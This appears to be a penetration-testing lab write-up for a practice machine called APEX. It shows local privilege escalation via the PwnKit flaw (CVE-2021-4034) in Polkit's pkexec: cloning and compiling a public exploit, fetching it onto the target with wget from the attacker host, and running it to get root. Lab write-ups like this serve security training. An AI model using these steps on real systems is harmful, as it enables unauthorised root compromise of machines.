InfoSec LAB

Apex_Privilege_Escalation_2

Created: 2 min read

CVE-2021-4034

PEAS has identified that the target system is vulnerable to CVE-2021-4034

The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

Exploit

Exploit found online

www-data@APEX:/dev/shm$ gcc
 
Command 'gcc' not found, but can be installed with:
 
apt install gcc
 
Please ask your administrator.

No compiler installed locally. Opting out to remote compilation.

Docker Exploit Development

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ docker run -it --entrypoint "/bin/bash" -v ./:/root/host --name apex ubuntu:18.04
root@fd24fdfb2c75:/# apt update -y ; apt install nano gcc gcc-multilib make git wget -y ; cd root/host
root@fd24fdfb2c75:~/host# git clone https://github.com/berdav/CVE-2021-4034 ; cd CVE-2021-4034 ; make
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56 (from 1)
Unpacking objects: 100% (92/92), done.
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
root@fd24fdfb2c75:~/host/CVE-2021-4034# cd ..; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034

set

Exploitation

www-data@APEX:/dev/shm$ wget -q http://192.168.45.215/CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
www-data@APEX:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
whoami
root
hostname
APEX
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.196.145  netmask 255.255.255.0  broadcast 192.168.196.255
        ether 00:50:56:9e:56:a6  txqueuelen 1000  (Ethernet)
        RX packets 20432  bytes 4713899 (4.7 MB)
        RX errors 0  dropped 36  overruns 0  frame 0
        TX packets 2146  bytes 524530 (524.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 552  bytes 40524 (40.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 552  bytes 40524 (40.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks